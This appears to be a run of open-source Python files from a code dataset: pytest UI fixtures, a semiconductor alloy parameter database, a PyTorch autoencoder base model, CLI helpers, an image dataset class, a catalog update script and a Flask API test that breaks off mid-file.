GenerateDocument(config).open_document_queue().clear_document_queue()\n\n\n@pytest.fixture\ndef ui_add_plan_to_wrapper(config):\n SearchPlan(config).open_plan_by_url(get_temp_data(config, 'client')['id'], get_temp_data(config, \"plan\", 1)[\"id\"])\n PlanActions(config).using_add_to_wrapper_dialog().add_plan_to_wrapper()\n\n\n@pytest.fixture\ndef ui_add_plan_report_note(config):\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).add_wrap_report_notes()\n\n\n@pytest.fixture\ndef ui_delete_plans_valuations(config):\n yield\n plans_list = utils.get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n SearchPlan(config).open_plan_by_url(get_temp_data(config, 'client')['id'], plan[\"id\"])\n PlanActions(config).delete_valuations()\n\n\n@pytest.fixture\ndef ui_delete_plan_valuations(config):\n yield\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).delete_valuations()\n\n\n@pytest.fixture\ndef ui_delete_funds(config):\n yield\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).delete_funds()\n\n\n@pytest.fixture\ndef ui_delete_funds_for_all_plans(config):\n yield\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n SearchPlan(config).open_plan_by_url(plan[\"owners\"][0][\"id\"], plan[\"id\"])\n PlanActions(config).delete_funds()\n\n\n@pytest.fixture\ndef ui_delete_funds_for_sub_plan(config):\n yield\n SearchPlan(config).open_plan_by_url(get_temp_data(config, 'client')['id'], get_temp_data(config, \"plan\", 1)[\"id\"])\n PlanActions(config).delete_funds()\n\n\n@pytest.fixture\ndef ui_create_delete_binder(config):\n ClientDocuments(config).open_client_by_url().open_client_binders().create_binder()\n yield\n ClientDocuments(config).open_client_by_url().open_client_binders().delete_binder()\n\n\n@pytest.fixture\ndef ui_delete_quote(config):\n yield\n GetClientQuote(config).open_client_by_url().navigate_to_quotes_and_apps().delete_quote()\n\n\n@pytest.fixture\ndef ui_add_delete_opportunity(config):\n SearchClient(config).open_client_by_url()\n ClientOpportunities(config).add_opportunity()\n yield\n SearchClient(config).open_client_by_url()\n ClientOpportunities(config).navigate_to_opportunities().open_opportunity().delete_opportunity()\n\n\n@pytest.fixture\ndef ui_delete_service_case(config):\n yield\n SearchClient(config).open_client_by_url()\n 
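# teardown: reopen the client and delete the service case created by the test\n 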
ClientServiceCase(config).navigate_to_service_cases().open_service_case().delete_service_case()\n\n\n@pytest.fixture\ndef ui_delete_service_case_for_all_clients(config):\n yield\n clients_list = utils.get_temp_data_collection(config, \"client\")\n for client in clients_list:\n SearchClient(config).open_client_by_url(client[\"id\"])\n ClientServiceCase(config).navigate_to_service_cases().open_service_case().delete_service_case()\n\n\n\n@pytest.fixture\ndef ui_delete_recommendations(config):\n yield\n SearchClient(config).open_client_by_url()\n PlanningOpportunities(config).using_planning_opportunities().open_recommendations()\\\n .using_delete_recommendations_dialog().delete_all_recommendations()\n\n\n@pytest.fixture\ndef ui_delete_lead_tasks(config):\n yield\n AddLeadTask(config).open_created_lead_by_url()\\\n .navigate_to_lead_task_and_appts()\\\n .delete_all_lead_tasks()\n\n\n@pytest.fixture\ndef ui_add_imps_manual_recommendation(config):\n PlanningOpportunities(config).open_client_by_url()\\\n .using_planning_opportunities()\\\n .open_recommendations()\\\n .using_add_manual_rec_dialog()\\\n .add_switch_recommendation_details()\\\n .add_model_portfolio(\"Automation Test iMPS Model\")\\\n .save_recommendation()\n\n\n@pytest.fixture\ndef ui_start_rebalance_communication_process(config):\n StartRebalanceCommunication(config).using_rebalance_communication_options_dialog()\\\n .start_rebalance_communication()\n LogIn(config).logout()\n\n# \n\n# \n\n\n@pytest.fixture\ndef file_delete_system_based_template(config):\n yield\n remove_file(config, config.file_path)\n\n\n@pytest.fixture\ndef file_delete_portfolio_reports(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"portfolio_report_data\"][\"pdf_name\"]))\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"portfolio_report_data\"][\"word_name\"]))\n\n\n@pytest.fixture\ndef file_delete_test_automation_document(config):\n yield\n remove_file(config, get_file_path(config, \"Test Automation Document.pdf\"))\n\n\n@pytest.fixture\ndef file_delete_mi_reports(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"mi_report_data\"][\"pdf_name\"]))\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"mi_report_data\"][\"csv_name\"]))\n\n\n@pytest.fixture\ndef file_reset_import_statement_file_1_name(config):\n yield\n ElectronicImports(config).reset_import_statement_file_name(\"csv_file_1\")\n\n\n@pytest.fixture\ndef file_reset_import_statement_file_2_name(config):\n yield\n ElectronicImports(config).reset_import_statement_file_name(\"csv_file_2\")\n\n\n@pytest.fixture\ndef file_delete_import_statement(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"provider_statement_data\"][\"xls_name\"]))\n\n\n@pytest.fixture\ndef file_delete_fact_find_pdf(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"fact_find_data\"][\"pdf_name\"]))\n\n\n@pytest.fixture\ndef file_delete_leads_import_csv(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"lead_data\"][\"leads_import_file_name\"]))\n\n\n@pytest.fixture\ndef file_delete_client_data_file(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"fact_find_data\"][\"client_data_file_name\"]))\n\n\n@pytest.fixture\ndef file_delete_quote_document_pdf(config):\n 
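# teardown only: remove the downloaded quote document after the test\n 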
yield\n remove_file(config, get_file_path(config, get_api_data(config, \"create_quote_document\")[\"object\"][\"original_filename\"]))\n\n\n@pytest.fixture\ndef file_delete_quote_result_document_pdf(config):\n yield\n remove_file(config, get_file_path(config, get_api_data(config, \"create_quote_document\")[\"object\"][\"original_filename\"]))\n\n\n# \n\n# ","repo_name":"intelliflovrk/raj_test_io","sub_path":"userjourneys/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":33316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40299310228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module provides an enum for better dealing with alloys names\nand a database with alloys properties\n\"\"\"\n\nfrom enum import Enum\n\nclass Alloy(Enum):\n \"\"\"\n An enum for labeling some alloys of interest\n \n Alloys under support currently are:\n - GaAs\n - AlAs\n - InAs\n - InP\n - GaP\n - AlGaAs\n - InGaAs\n - AlInAs\n \"\"\"\n GaAs = 1\n AlAs = 2\n InAs = 3\n InP = 4\n GaP = 5\n AlGaAs = 6 # Al(x)Ga(1-x)As\n InGaAs = 7 # In(1-x)Ga(x)As\n AlInAs = 8 # Al(x)In(1-x)As\n\nclass Database:\n \"\"\"\n This class provides parameters, deformation, and effective masses\n for some selected alloys, it is currently based on:\n\n Chuang, S. L. (1995). Physics of optoelectronic devices. New York: Wiley.\n Appendix K: tables K.2 and K.3\n \"\"\"\n\n def __init__(self, alloy, concentration=1.0):\n \"\"\"\n An instance of this class represents a single alloy, which must be\n informed in this constructor\n\n Parameters\n ----------\n alloy : Alloy\n the alloy which the instance is going to represent\n concentration : float\n some alloys have characteristic ratios between components, they\n are usually pointed as `x`\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> print(\"Gap at 0K - %.2f eV\" % algaas_03.parameters('eg_0'))\n Gap at 0K - 2.00 eV\n \"\"\"\n self.alloy = alloy\n self.concentration = concentration\n\n # this is the default (currently the only one) source\n self.chuang_db = {\n Alloy.GaAs: {\n 'parameters': {\n 'a0': 5.6533,\n 'eg_0': 1.519,\n 'eg_300': 1.424,\n 'eg_0_ind': None,\n 'eg_300_ind': None,\n 'delta': 0.34,\n 'ev_av': -6.92,\n 'optical_matrix': 25.7,\n 'parameter_ep': 25.0\n },\n 'deformation_potentials': {\n 'a_c': -7.17,\n 'a_v': 1.16,\n 'a': -8.33,\n 'b': -1.7,\n 'd': -4.55,\n 'c11': 11.879,\n 'c12': 5.376,\n 'c44': 5.94\n },\n 'effective_masses': {\n 'm_e': 0.067,\n 'm_hh': 0.5,\n 'm_lh': 0.087,\n 'm_hh_z': 0.333,\n 'm_lh_z': 0.094,\n 'gamma_1': 6.8,\n 'gamma_2': 1.9,\n 'gamma_3': 2.73,\n }\n },\n Alloy.AlAs: {\n 'parameters': {\n 'a0': 5.66,\n 'eg_0': 3.13,\n 'eg_300': 3.03,\n 'eg_0_ind': 2.229,\n 'eg_300_ind': 2.168,\n 'delta': 0.28,\n 'ev_av': -7.49,\n 'optical_matrix': 21.1,\n 'parameter_ep': None\n },\n 'deformation_potentials': {\n 'a_c': -5.64,\n 'a_v': 2.47,\n 'a': -8.11,\n 'b': -1.5,\n 'd': -3.4,\n 'c11': 12.5,\n 'c12': 5.34,\n 'c44': 5.42\n },\n 'effective_masses': {\n 'm_e': 0.15,\n 'm_hh': 0.79,\n 'm_lh': 0.15,\n 'm_hh_z': 0.478,\n 'm_lh_z': 0.208,\n 'gamma_1': 3.45,\n 'gamma_2': 0.68,\n 'gamma_3': 1.29,\n }\n },\n Alloy.InAs: {\n 'parameters': {\n 'a0': 6.0584,\n 'eg_0': 0.42,\n 'eg_300': 0.354,\n 'eg_0_ind': None,\n 'eg_300_ind': None,\n 'delta': 0.38,\n 'ev_av': -6.67,\n 'optical_matrix': 22.2,\n 'parameter_ep': None\n },\n 'deformation_potentials': {\n 'a_c': -5.08,\n 'a_v': 1.0,\n 
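# a_c, a_v, a, b, and d are deformation potentials in eV; c11, c12, c44 are elastic constants\n 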
'a': -6.08,\n 'b': -1.8,\n 'd': -3.6,\n 'c11': 8.329,\n 'c12': 4.526,\n 'c44': 3.96\n },\n 'effective_masses': {\n 'm_e': 0.023,\n 'm_hh': 0.4,\n 'm_lh': 0.026,\n 'm_hh_z': 0.0263,\n 'm_lh_z': 0.027,\n 'gamma_1': 20.4,\n 'gamma_2': 8.3,\n 'gamma_3': 9.1,\n }\n },\n Alloy.InP: {\n 'parameters': {\n 'a0': 5.8688,\n 'eg_0': 1.424,\n 'eg_300': 1.344,\n 'eg_0_ind': None,\n 'eg_300_ind': None,\n 'delta': 0.11,\n 'ev_av': -7.04,\n 'optical_matrix': 20.7,\n 'parameter_ep': 16.7\n },\n 'deformation_potentials': {\n 'a_c': -5.04,\n 'a_v': 1.27,\n 'a': -6.31,\n 'b': -1.7,\n 'd': -5.6,\n 'c11': 10.11,\n 'c12': 5.61,\n 'c44': 4.56\n },\n 'effective_masses': {\n 'm_e': 0.077,\n 'm_hh': 0.6,\n 'm_lh': 0.12,\n 'm_hh_z': 0.606,\n 'm_lh_z': 0.121,\n 'gamma_1': 4.95,\n 'gamma_2': 1.65,\n 'gamma_3': 2.35,\n }\n },\n Alloy.GaP: {\n 'parameters': {\n 'a0': 5.4505,\n 'eg_0': 2.78,\n 'eg_300': 1.344,\n 'eg_0_ind': 2.35,\n 'eg_300_ind': 2.27,\n 'delta': 0.08,\n 'ev_av': -7.4,\n 'optical_matrix': 22.2,\n 'parameter_ep': None\n },\n 'deformation_potentials': {\n 'a_c': -7.14,\n 'a_v': 1.70,\n 'a': -8.83,\n 'b': -1.8,\n 'd': -4.5,\n 'c11': 14.05,\n 'c12': 6.203,\n 'c44': 7.033\n },\n 'effective_masses': {\n 'm_e': 0.25,\n 'm_hh': 0.67,\n 'm_lh': 0.17,\n 'm_hh_z': 0.326,\n 'm_lh_z': 0.199,\n 'gamma_1': 4.05,\n 'gamma_2': 0.49,\n 'gamma_3': 1.25,\n }\n },\n }\n\n # specify a dummy order for some known ternary alloys\n self.ternary_order = {\n Alloy.AlGaAs: (Alloy.AlAs, Alloy.GaAs),\n Alloy.InGaAs: (Alloy.GaAs, Alloy.InAs),\n Alloy.AlInAs: (Alloy.AlAs, Alloy.InAs)\n }\n\n # P(A(x)B(1-x)C) = x P(AC) + (1-x) P(BC)\n if self.alloy in self.ternary_order:\n alloy_1, alloy_2 = self.ternary_order[self.alloy]\n self.chuang_db[self.alloy] = {}\n for property_type in self.chuang_db[alloy_1].keys():\n property_values = {}\n for property_name in \\\n self.chuang_db[alloy_1][property_type].keys():\n value_alloy_1 = \\\n self.chuang_db[alloy_1][property_type][property_name]\n value_alloy_2 = \\\n self.chuang_db[alloy_2][property_type][property_name]\n property_values[property_name] = \\\n (value_alloy_1 and value_alloy_2 and \\\n concentration*value_alloy_1+\\\n (1.0-concentration)*value_alloy_2) or None\n self.chuang_db[self.alloy][property_type] = property_values\n\n def alloy_property(self, property_type, property_name):\n \"\"\"\n this is just a shortcut for accessing the database\n\n Parameters\n ----------\n property_type : string\n the property type as in the database, possible values are:\n - `parameters`\n - `deformation_potentials`\n - `effective_masses`\n property_name : string\n the property name as in the database, example values are:\n - `eg_0`\n - `a_c`\n\n Returns\n -------\n property : float\n the value of the property\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> gap = algaas_03.alloy_property('parameters', 'eg_0')\n >>> print(\"Gap at 0K - %.2f eV\" % gap)\n Gap at 0K - 2.00 eV\n \"\"\"\n return self.chuang_db[self.alloy][property_type][property_name]\n\n def parameters(self, parameter_name):\n \"\"\"\n this is just a shortcut for using `alloy_property` method above\n\n Parameters\n ----------\n property_name : string\n the property name as in the database, example values are:\n - `eg_0`\n - `eg_300`\n\n Returns\n -------\n property : float\n the value of the parameter\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> print(\"Gap at 0K - %.2f 
eV\" % algaas_03.parameters('eg_0'))\n Gap at 0K - 2.00 eV\n \"\"\"\n return self.alloy_property('parameters', parameter_name)\n\n def deformation_potentials(self, parameter_name):\n \"\"\"\n this is just a shortcut for using `alloy_property` method above\n\n Parameters\n ----------\n property_name : string\n the property name as in the database, example values are:\n - `a_c`\n - `a_v`\n\n Returns\n -------\n property : float\n the value of the deformation parameters\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> a_v = algaas_03.deformation_potentials('a_v')\n >>> print(\"Valence defformation potencial - %.2f eV\" % a_v)\n Valence defformation potencial - 1.55 eV\n \"\"\"\n return self.alloy_property('deformation_potentials', parameter_name)\n\n def effective_masses(self, parameter_name):\n \"\"\"\n this is just a shortcut for using `alloy_property` method above\n\n Parameters\n ----------\n property_name : string\n the property name as in the database, example values are:\n - `m_e`\n - `m_hh`\n\n Returns\n -------\n property : float\n the value of the effective mass\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> m_e = algaas_03.effective_masses('m_e')\n >>> print(\"Electron effective mass - %.3f\" % m_e)\n Electron effective mass - 0.092\n \"\"\"\n return self.alloy_property('effective_masses', parameter_name)\n","repo_name":"thiagolcmelo/time-evolution","sub_path":"band_structure_database.py","file_name":"band_structure_database.py","file_ext":"py","file_size_in_byte":11785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36172481698","text":"\"\"\"\nBase model defining the training procedure and some common methods for SAEs\n\n\"\"\"\n__date__ = \"June - July 2022\"\n\n\nimport numpy as np\nfrom sklearn.utils.validation import check_is_fitted\nimport torch\nfrom torch.utils.data import TensorDataset, DataLoader\nimport warnings\n\nfrom .. import __commit__ as LPNE_COMMIT\nfrom .. import __version__ as LPNE_VERSION\nfrom .. 
import INVALID_LABEL\nfrom ..utils.utils import get_weights\n\n\nFLOAT = torch.float32\nINT = torch.int64\n\n\nclass BaseModel(torch.nn.Module):\n def __init__(self, n_iter=50000, batch_size=256, lr=1e-3, device=\"auto\"):\n \"\"\"\n\n Parameters\n ----------\n n_iter : int, optional\n Number of epochs to train\n batch_size : int, optional\n DataLoader batch size\n lr : float, optional\n Learning rate\n device : str, optional\n Pytorch device\n \"\"\"\n super(BaseModel, self).__init__()\n self.n_iter = n_iter\n self.batch_size = batch_size\n self.lr = lr\n self.device = device\n if self.device == \"auto\":\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.classes_ = None\n self.groups_ = None\n\n def _initialize(self):\n self.n_groups = len(self.groups_)\n self.n_classes = len(self.classes_)\n self.to(self.device)\n self.iter_ = 1\n\n def fit(\n self,\n features,\n labels,\n groups=None,\n print_freq=5,\n score_freq=20,\n random_state=None,\n ):\n \"\"\"\n Train the model on the given dataset.\n\n Parameters\n ----------\n features : numpy.ndarray\n Shape: [b,f,r,r]\n labels : numpy.ndarray\n Shape: [b]\n groups : None or numpy.ndarray\n Shape: [b]\n print_freq : int or None, optional\n Print loss every ``print_freq`` epochs.\n score_freq : int or None, optional\n Print weighted accuracy every ``score_freq`` epochs.\n random_state : int or None, optional\n A random seed for training. If ``None``, then no seed is set.\n\n Returns\n -------\n self : BaseModel\n The fitted model\n \"\"\"\n # Check arguments. The group checks are skipped when groups is None,\n # which the rest of this method explicitly supports.\n assert features.ndim == 4\n assert labels.ndim == 1\n assert len(features) == len(labels)\n if groups is not None:\n assert groups.ndim == 1\n assert len(labels) == len(groups)\n # Remove missing data.\n axes = tuple(i for i in range(1, features.ndim))\n idx = np.argwhere(np.isnan(features).sum(axis=axes) == 0).flatten()\n features = features[idx]\n labels = labels[idx]\n if groups is not None:\n groups = groups[idx]\n # Initialize weights, groups, and labels.\n weights = get_weights(labels, groups, invalid_label=INVALID_LABEL)\n idx = np.argwhere(labels == INVALID_LABEL).flatten()\n idx_comp = np.argwhere(labels != INVALID_LABEL).flatten()\n # Mask the labels temporarily, get the classes, and unmask.\n temp_label = np.unique(labels[labels != INVALID_LABEL])[0]\n labels[idx] = temp_label\n self.classes_, labels = np.unique(labels, return_inverse=True)\n labels[idx] = INVALID_LABEL\n assert len(self.classes_) > 1\n # Figure out the groups.\n if groups is None:\n groups = np.zeros(len(features))\n np_groups = np.copy(groups)\n self.groups_, groups = np.unique(groups, return_inverse=True)\n np_labels = np.copy(labels)\n # Set the random seed if one is given.\n if random_state is not None:\n torch.manual_seed(random_state)\n # Initialize the parameters.\n self.features_shape_ = features.shape\n self._initialize()\n # NumPy arrays to PyTorch tensors.\n features = torch.tensor(features, dtype=FLOAT).to(self.device)\n labels = torch.tensor(labels, dtype=INT).to(self.device)\n groups = torch.tensor(groups, dtype=INT).to(self.device)\n weights = torch.tensor(weights, dtype=FLOAT).to(self.device)\n # Make a Dataset, a DataLoader, and an optimizer.\n dset = TensorDataset(features, labels, groups, weights)\n loader = DataLoader(dset, batch_size=self.batch_size, shuffle=True)\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n # Train.\n while self.iter_ <= self.n_iter:\n i_loss = 0.0\n for batch in loader:\n self.zero_grad()\n loss = self(*batch)\n i_loss += loss.item()\n loss.backward()\n 
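# apply the Adam update using the gradients accumulated for this batch\n 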
optimizer.step()\n if print_freq is not None and self.iter_ % print_freq == 0:\n print(f\"iter {self.iter_:04d}, loss: {i_loss:.3f}\")\n if score_freq is not None and self.iter_ % score_freq == 0:\n weighted_acc = self.score(\n features[idx_comp],\n np_labels[idx_comp],\n np_groups[idx_comp],\n )\n print(f\"iter {self.iter_:04d}, acc: {weighted_acc:.3f}\")\n self.iter_ += 1\n return self\n\n @torch.no_grad()\n def reconstruct(self, features):\n \"\"\"\n Reconstruct the features by sending them round trip through the model.\n\n Parameters\n ----------\n features : numpy.ndarray\n Shape: ``[b,x]`` or ``[b,f,r,r]``\n\n Returns\n -------\n rec_features : numpy.ndarray\n Shape: same as ``features``\n \"\"\"\n check_is_fitted(self, attributes=self.FIT_ATTRIBUTES)\n assert features.ndim in [2, 4]\n flag = features.ndim == 4\n if flag:\n assert features.shape[2] == features.shape[3]\n orig_shape = features.shape\n features = features.reshape(len(features), -1)\n rec_features = []\n i = 0\n while i <= len(features):\n batch_f = features[i : i + self.batch_size]\n batch_f = torch.tensor(batch_f).to(self.device, FLOAT)\n batch_zs = self.get_latents(batch_f)\n batch_rec = self.project_latents(batch_zs)\n rec_features.append(batch_rec.cpu())\n i += self.batch_size\n rec_features = torch.cat(rec_features, dim=0).numpy()\n if flag:\n return rec_features.reshape(orig_shape)\n return rec_features\n\n def get_params(self, deep=True):\n \"\"\"Get the parameters of this estimator.\"\"\"\n params = dict(\n batch_size=self.batch_size,\n lr=self.lr,\n device=self.device,\n model_name=self.MODEL_NAME,\n __commit__=LPNE_COMMIT,\n __version__=LPNE_VERSION,\n )\n try:\n params[\"classes_\"] = self.classes_\n params[\"groups_\"] = self.groups_\n params[\"iter_\"] = self.iter_\n params[\"features_shape_\"] = self.features_shape_\n except:\n pass\n if deep:\n state_dict = self.state_dict()\n if len(state_dict) > 0:\n for key in state_dict:\n state_dict[key] = state_dict[key].to(\"cpu\")\n params[\"state_dict\"] = state_dict\n try:\n params[\"optimizer_state_dict\"] = self.optimizer_.state_dict()\n except:\n pass\n return params\n\n def set_params(\n self,\n batch_size=None,\n lr=None,\n n_iter=None,\n device=None,\n classes_=None,\n groups_=None,\n iter_=None,\n features_shape_=None,\n state_dict=None,\n optimizer_state_dict=None,\n **kwargs,\n ):\n \"\"\"Set the parameters of this estimator.\"\"\"\n if batch_size is not None:\n self.batch_size = batch_size\n if lr is not None:\n self.lr = lr\n if n_iter is not None:\n self.n_iter = n_iter\n if device is not None:\n if (not torch.cuda.is_available()) and device != \"cpu\":\n warnings.warn(\"Loading GPU-trained model as a CPU model.\")\n self.device = \"cpu\"\n else:\n self.device = device\n if features_shape_ is not None:\n self.features_shape_ = features_shape_\n if classes_ is not None:\n self.classes_ = classes_\n if groups_ is not None:\n self.groups_ = groups_\n if iter_ is not None:\n self.iter_ = iter_\n if state_dict is not None or optimizer_state_dict is not None:\n self._initialize()\n if state_dict is not None:\n self.load_state_dict(state_dict)\n if optimizer_state_dict is not None:\n self.optimizer_.load_state_dict(optimizer_state_dict)\n return self\n\n @torch.no_grad()\n def save_state(self, fn):\n \"\"\"Save parameters for this estimator.\"\"\"\n params = self.get_params(deep=True)\n np.save(fn, params)\n\n @torch.no_grad()\n def load_state(self, fn):\n \"\"\"Load and set the parameters for this estimator.\"\"\"\n d = np.load(fn, 
allow_pickle=True).item()\n if \"model_name\" in d:\n model_name_1 = d[\"model_name\"].lower().replace(\" \", \"\").replace(\"_\", \"\")\n model_name_2 = self.MODEL_NAME.lower().replace(\" \", \"\").replace(\"_\", \"\")\n assert (\n model_name_1 == model_name_2\n ), f\"Expected {self.MODEL_NAME}, found {d['model_name']}\"\n else:\n warnings.warn(\"Didn't find field model_name when loading model.\")\n self.set_params(**d)\n\n\nif __name__ == \"__main__\":\n pass\n\n\n###\n","repo_name":"carlson-lab/lpne","sub_path":"lpne/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":9650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32149831568","text":"from argparse import ArgumentParser\nfrom sys import exit, stderr\nfrom colorama import Fore, Style\nfrom ..abstractmodel import Session\n\n\ndef print_version(programName):\n import importlib.metadata\n\n version = importlib.metadata.version(\"3dmdiff\")\n print(f\"{programName} {version}\")\n # v2 = importlib.metadata.version(\"rhino3dm\")\n exit()\n\n\ndef checkForArgument(*names, help=None) -> tuple[ArgumentParser, bool]:\n parser = ArgumentParser(add_help=False)\n flag = parser.add_argument(*names, action=\"store_true\", help=help)\n args, _ = parser.parse_known_args()\n return parser, vars(args)[flag.dest]\n\n\ndef checkForVersionArgument(programName) -> ArgumentParser:\n parser, hasVersionArg = checkForArgument(\n \"-v\", \"--version\", help=\"output version info and exit\"\n )\n if hasVersionArg:\n print_version(programName)\n return parser\n\n\nclass ConsoleSession(Session):\n def __init__(self):\n self._componentType = None\n self._componentID = None\n self._property = None\n\n def setContext(self, componentType, componentID, property):\n self._componentType = componentType\n self._componentID = componentID\n self._property = property\n\n def _context(self):\n if self._componentType:\n ctx = \" in \"\n if self._property:\n ctx += f\"{self._property} property of \"\n ctx += f\"{self._componentType} {self._componentID}\"\n return ctx\n return \"\"\n\n def ask(self, question: str) -> bool:\n pass\n\n def warn(self, message: str) -> None:\n print(\n Fore.YELLOW + \"Warning: \" + message + self._context() + Style.RESET_ALL,\n file=stderr,\n )\n\n def fatal(self, message: str) -> None:\n print(\n Fore.RED + \"Fatal error: \" + message + self._context() + Style.RESET_ALL,\n file=stderr,\n )\n exit(1)\n\n\n# class InteractiveConsoleSession(ConsoleSession)\n","repo_name":"coditect/opennurbs-diffutils","sub_path":"src/opennurbs_diffutils/cmd/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19543501742","text":"def solution(X, Y):\n compare = [str(i) for i in range(9,-1,-1)]\n answer = ''\n \n for i in compare:\n answer += i*min(X.count(i), Y.count(i))\n \n if len(answer) != 0:\n if answer.count('0') == len(answer):\n answer = '0'\n return answer\n else:\n return \"-1\"\n\nprint(f'test1 = {solution(\"100\",\"2345\")}')\nprint(f'test2 = {solution(\"100\",\"203045\")}')\nprint(f'test3 = {solution(\"100\",\"123450\")}')\nprint(f'test4 = {solution(\"12321\",\"42531\")}')\nprint(f'test5 = {solution(\"5525\",\"1255\")}')","repo_name":"Ji-Hwan-Jung/coding-test","sub_path":"level1/숫자 짝꿍.py","file_name":"숫자 
짝꿍.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42107538992","text":"import os\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\n\n\nclass PileogramDataset(Dataset):\n\n def __init__(self, dir_repeats, dir_chimeric, dir_normal, dir_junk, transform=None):\n self.path_list = []\n self.label_list = []\n self.transform = transform\n\n for file in os.listdir(dir_repeats):\n self.path_list.append(os.path.join(dir_repeats, file))\n self.label_list.append(0)\n for file in os.listdir(dir_chimeric):\n self.path_list.append(os.path.join(dir_chimeric, file))\n self.label_list.append(1)\n for file in os.listdir(dir_normal):\n self.path_list.append(os.path.join(dir_normal, file))\n self.label_list.append(2)\n for file in os.listdir(dir_junk):\n self.path_list.append(os.path.join(dir_junk, file))\n self.label_list.append(3)\n\n def __len__(self):\n return 2 * len(self.path_list)\n # return len(self.path_list)\n\n def __getitem__(self, idx):\n if idx < len(self.path_list):\n image = Image.open(self.path_list[idx])\n label = self.label_list[idx]\n path = str(self.path_list[idx])\n if self.transform:\n image = self.transform(image)\n sample = {'image': image, 'label': label, 'path': path}\n return sample\n else:\n horizontal_flip = transforms.RandomHorizontalFlip(p=1.0)\n image = Image.open(self.path_list[idx - len(self.path_list)])\n image = horizontal_flip(image)\n label = self.label_list[idx - len(self.path_list)]\n path = str(self.path_list[idx - len(self.path_list)])\n path = path[:-4] + '_flipped' + path[-4:]\n if self.transform:\n image = self.transform(image)\n sample = {'image': image, 'label': label, 'path': path}\n return sample\n","repo_name":"lvrcek/LongReadClassification","sub_path":"pileogram.py","file_name":"pileogram.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5090666959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport logging\nimport sys\nimport os.path\nimport tqdm\n\nif os.path.abspath('..') not in sys.path:\n sys.path.insert(0, os.path.abspath('..'))\nimport flows\nfrom tendrils import api\n\n\n# --------------------------------------------------------------------------------------------------\nclass TqdmLoggingHandler(logging.Handler):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def emit(self, record):\n try:\n msg = self.format(record)\n tqdm.tqdm.write(msg)\n self.flush()\n except (KeyboardInterrupt, SystemExit): # pragma: no cover\n raise\n except: # noqa: E722, pragma: no cover\n self.handleError(record)\n\n\n# --------------------------------------------------------------------------------------------------\nif __name__ == '__main__':\n\n # Setup logging:\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n console = TqdmLoggingHandler()\n console.setFormatter(formatter)\n logger = logging.getLogger('flows')\n if not logger.hasHandlers():\n logger.addHandler(console)\n logger.setLevel(logging.INFO)\n\n # Do it by status, just to prioritize things a bit:\n for tgtstatus in ('target', 'candidate', 'rejected'):\n targetids = sorted([tgt['targetid'] for tgt in api.get_targets() if tgt['target_status'] == tgtstatus])[\n ::-1]\n\n for targetid in tqdm.tqdm(targetids, desc=tgtstatus):\n donefile = 
f\"catalog_updates/{targetid:05d}.done\"\n if not os.path.exists(donefile):\n try:\n flows.catalogs.download_catalog(targetid, update_existing=True)\n except:\n logger.exception(\"targetid=%d\", targetid)\n else:\n open(donefile, 'w').close()\n","repo_name":"SNflows/flows","sub_path":"notes/update_all_catalogs.py","file_name":"update_all_catalogs.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"36354581417","text":"import unittest\nimport json\nimport os\nfrom app import app\nfrom flask import Flask\n\nBASE_URL = 'http://127.0.0.1:5000/api/'\nGET_URL ='http://127.0.0.1:5000/api/1'\nUPDATE_URL ='http://127.0.0.1:5000/api/1'\nDELETE_URL ='http://127.0.0.1:5000/api/2'\nclass MyApiTestCase(unittest.TestCase):\n\n def setUp(self):\n self.app = app.test_client()\n self.app.testing = True\n\n def test_todo_creation(self):\n todo = {\n 'title': u'Finish Api',\n 'description': u'Finish this api and submit',\n 'done': False\n }\n response = self.app.post(BASE_URL,\n data=json.dumps(todo),\n 